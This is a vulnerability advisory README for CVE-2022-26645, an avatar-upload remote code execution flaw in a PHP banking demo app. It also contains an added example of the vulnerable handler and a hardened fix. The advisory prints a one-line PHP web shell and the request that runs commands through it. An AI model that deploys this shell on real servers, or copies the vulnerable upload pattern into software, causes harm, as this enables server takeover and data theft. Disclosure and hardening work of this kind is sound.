CVE-2022-26645: CVE/CVE-2022-26645 at main · erik-451/CVE
A remote code execution (RCE) vulnerability in Online Banking System Protect v1.0 allows attackers to execute arbitrary code via a crafted PHP file uploaded through the Upload Image function.
Latest commit: erik-451, Create README.md (9b75638), Mar 29, 2022
README.md
Title: Online Banking System RCE
Author: Erik451
Vendor Homepage: https://www.sourcecodester.com/
Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html
Version: OBS 1.0
CVE: CVE-2022-26645

- Description: Unrestricted file upload leading to RCE (and XSS) via the avatar upload. The Upload Image function does not validate the type or extension of the uploaded file, so a user who can reach the admin profile page can upload a crafted PHP file into the web root and have the server execute it.
Steps to reproduce:
1. Go to http://web.com/admin/?page=user
2. Edit your profile avatar and upload a PHP file instead of an image. Payload used:

```php
<?php echo shell_exec($_GET['shell']); ?>
```

3. Click on the image area to get the URL of the uploaded file.
4. Requesting that URL executes the code. The stored name is the upload timestamp followed by the original filename, so the `.php` extension is preserved and PHP runs it:

http://<ip_server>/uploads/1648559940_shell.php?shell=id
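For context on the root cause and on what a fix looks like, the following is an added example and not code from this repository or from the Online Banking System project. It reconstructs the vulnerable upload pattern implied by the stored filename (Unix timestamp plus the client-supplied name, written under `uploads/` inside the web root) next to a hardened handler. The form field name `img`, the `uploads/` path and the function names are assumptions; only the filename pattern comes from the advisory.

```php
<?php
// Added example, not the project's own code. The field name "img", the
// uploads/ directory and both function names are assumptions.

// Vulnerable pattern: trusts the client-supplied filename and writes it into
// a directory served by PHP. A file named shell.php becomes
// uploads/<timestamp>_shell.php and is executed on the next GET request.
function save_avatar_vulnerable(array $file, string $uploadDir): string
{
    $name = time() . '_' . $file['name'];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('upload failed');
    }
    return $dest;
}

// Hardened pattern: check the upload status, cap the size, allowlist the
// detected MIME type (not the client-supplied name or Content-Type),
// re-encode the image through GD so any embedded "<?php" is discarded,
// and choose a random server-side filename with a fixed extension.
function save_avatar_hardened(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('invalid upload');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('file too large');
    }

    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg'];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('unsupported image type');
    }
    $ext = $allowed[$mime];

    // Decoding and re-encoding drops everything that is not pixel data,
    // including PHP code appended to, or hidden in the metadata of, a real image.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a valid image');
    }

    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    $ok = ($ext === 'png') ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    // Persist only the generated name; never a client-controlled path.
    return $name;
}

// Usage in the profile update handler (assumed field name "img"):
// $avatar = save_avatar_hardened($_FILES['img'], __DIR__ . '/uploads');
```

Even with the hardened handler, the upload directory should not be executable: on Apache with mod_php, `php_admin_flag engine off` in the `uploads/` directory configuration, or on nginx a `location ~ ^/uploads/.*\.php$ { return 403; }` block, means a file that slips through is served as bytes rather than run. To verify a fix, repeat step 4 above: the response should be a 403/404 or the literal file contents, not the output of `id`.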